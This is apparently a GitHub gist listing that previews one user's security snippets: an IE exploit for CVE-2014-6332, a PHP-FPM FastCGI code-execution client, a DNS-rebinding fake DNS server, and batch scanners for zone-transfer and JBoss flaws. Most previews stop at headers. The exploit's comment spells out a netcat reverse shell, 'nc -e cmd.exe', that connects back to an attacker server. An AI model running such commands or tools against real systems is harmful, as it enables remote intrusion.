Skip to content

Instantly share code, notes, and snippets.

@xkon
xkon / simpleHttpFileServer.go
Created May 31, 2018 13:53
simple http file server with golang
package main
import (
"flag"
"fmt"
"log"
"net/http"
"path/filepath"
)
@xkon
xkon / cve-2014-6332_exploit.html
Created April 13, 2018 14:42 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)
@xkon
xkon / Dockerfile
Created September 18, 2017 01:33
更改apk源为中科大,ruby源为ruby-china,以加快build速度的 metasploit-framework Dockerfile 。源Dockerfile地址:https://github.com/rapid7/metasploit-framework
FROM ruby:2.4.1-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV MSF_USER msf
ENV NMAP_PRIVILEGED=""
WORKDIR $APP_HOME
COPY Gemfile* m* Rakefile $APP_HOME
@xkon
xkon / fpm.py
Last active May 30, 2017 04:06 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
@xkon
xkon / FakeDNSServer.py
Created February 23, 2017 02:18
a simple fake DNS server for DNS rebinding Attack
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : xk0n
# @Date : 2017-00-00
# from __future__ import print_function,division,unicode_literals
import SocketServer
import struct
import datetime
import logging
@xkon
xkon / xfr_check.py
Last active November 8, 2022 04:40
批量检测域传送漏洞python脚本
#!/usr/bin/env python
# -*- coding=utf-8
# 批量测试域传送漏洞
# usage: ./xfr_check.py domain.lst domain.lst is the file contain domain per line
# by xk0n 2015.09.11
import sys
import time
import dns.resolver
import dns.zone
#!/usr/bin/env python
# -*- coding=utf-8
# Jboss JMXInvokerServlet 批量探测脚本
# usage: ./invoker_assassin.py ipfile.lst
# ipfile.lst 中保存要批量探测的IP列表,支持CIDR方式
# 结果保存在result_vuls.lst中
# By xk0n 2015.09.10
import sys
from itertools import product